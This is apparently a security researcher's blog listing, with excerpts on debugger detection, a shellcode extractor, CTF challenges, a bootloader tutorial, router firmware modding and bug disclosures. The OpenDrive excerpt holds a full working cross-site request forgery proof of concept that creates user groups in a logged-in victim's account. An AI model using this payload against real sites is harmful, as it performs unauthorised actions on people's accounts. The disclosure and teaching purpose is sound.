I got listed in the Dato Capitol Hall of Fame for reporting a XSRF issue in their website.
https://en.datocapital.com/report-security-issue.html
Uncategorized
Debugger Detection Using NtGlobalFlag
This is another simple anti-reversing trick used to detect a debugger. As I have shown earlier in my post about the TEB structure and the PEB structure, NtGlobalFlag is located in the PEB Structure at offset PEB+104.
When the process is being debugged the NtGlobalFlag is set to 0x70.
Share this:
Shellcode Extractor
This tool will extract the opcodes from the .text section and display in different hex formats for different syntaxes. Works only with valid PE files. Coded in C++Builder XE5.
Download: https://github.com/OsandaMalith/ShellCode-Extractor/releases
Share this:
2014 Flare On Challenge 2
You can download the challenge from here : http://www.flare-on.com/files/C2.zip
The zip file contains a html file and an image as the logo of the html file inside the img folder.
If we open the image in a hex editor we can see at the end it contains PHP code.
Share this:
2015 in review
The WordPress.com stats helper monkeys prepared a 2015 annual report for this blog.
Here’s an excerpt:
Madison Square Garden can seat 20,000 people for a concert. This blog was viewed about 69,000 times in 2015. If it were a concert at Madison Square Garden, it would take about 3 sold-out performances for that many people to see it.
Click here to see the complete report.
Share this:
Pwning OpenDrive Users
After a long time being away from bug hunting I randomly found these few bugs in the OpenDrive.com website.
If the attacker can run this code while the user is logged in he can create his own Groups in the users section. This is the proof of concept and you will see groups such as “pwned” being created.
XSRF in Creating Groups
[code language=”html”]
<html>
<!– Discovered by @OsandaMalith–>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://www.opendrive.com/ajax", true);
xhr.setRequestHeader("Accept", "application/json, text/javascript, */*; q=0.01");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.8");
xhr.withCredentials = true;
var body = "action=create-usergroup&group_name=pwned&group_max_storage=5120&group_bw_max=1024";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Click Here to Pwn" onclick="submitRequest();" />
</form>
</body>
</html>
[/code]
(more…)
Share this:
Informatica Reflected XSS
This is old vulnerability I found in Informatica and got fixed recently. Honestly I’ve been a bit away from bug hunting due to studies and all. Well, stay tuned, found some cool bugs in few sites and products. Will disclose shortly 🙂
Share this:
Writing a Bootloader
What is a Bootloader?
A bootloader is a special program that is executed each time a bootable device is initialized by the computer during its power on or reset that will load the kernel image into the memory. This application is very close to hardware and to the architecture of the CPU. All x86 PCs boot in Real Mode. In this mode you have only 16-bit instructions. Our bootloader runs in Real Mode and our bootloader is a 16-bit program.
https://manybutfinite.com/img/boot/bootProcess.png
How this works?
When you switch on the PC the BIOS want to boot up an OS which must be found somewhere in hard disks, floppy disk, CDs, etc. The order in which BIOS searches an OS is user configurable. Next the BIOS reads the first 512 byte sector of the bootable disk. Usually a sector is 512 bytes in size. This is known as the Master Boot Record (MBR). BIOS simply loads the contents of the MBR into memory location “0x7c00” and jumps to that location to start executing whatever code is in the MBR. Our bootloader should be 512 bytes in size as well.
https://manybutfinite.com/img/boot/masterBootRecord.png
(more…)
Share this:
How to Turn Your Switch into a Snitch
Warning: The author takes no responsibility for any damage you may cause to your device. This post is meant for educational purposes and strictly NOT for malicious purposes.
This post is all about modifying your existing router firmware to perform cool things.
Hardware and Tools Needed:
For the router, I am using a TP-Link MR3020. You may use whatever router you like but make sure you won’t brick your device after or while uploading the modified firmware. Also make sure your firmware can be reversed and dumped using the FMK (Firmware Mod Kit).
Download Firmware Mod Kit
(more…)
Share this:
Solving Root-Me XORed Picture Challenge
Here‘s a cool challenge by Ryscrow of Root-Me . The challenge says
For this challenge you will need to decypher a simple XORed picture. This BMP picture was mistakenly encrypted. Can you recover it ?
The file name is “ch3.bmp” and let’s open in a hex editor and see. I first inspected the first 20 bytes and we can see a string saying “fallen”. Actually I guessed this key of length 6.
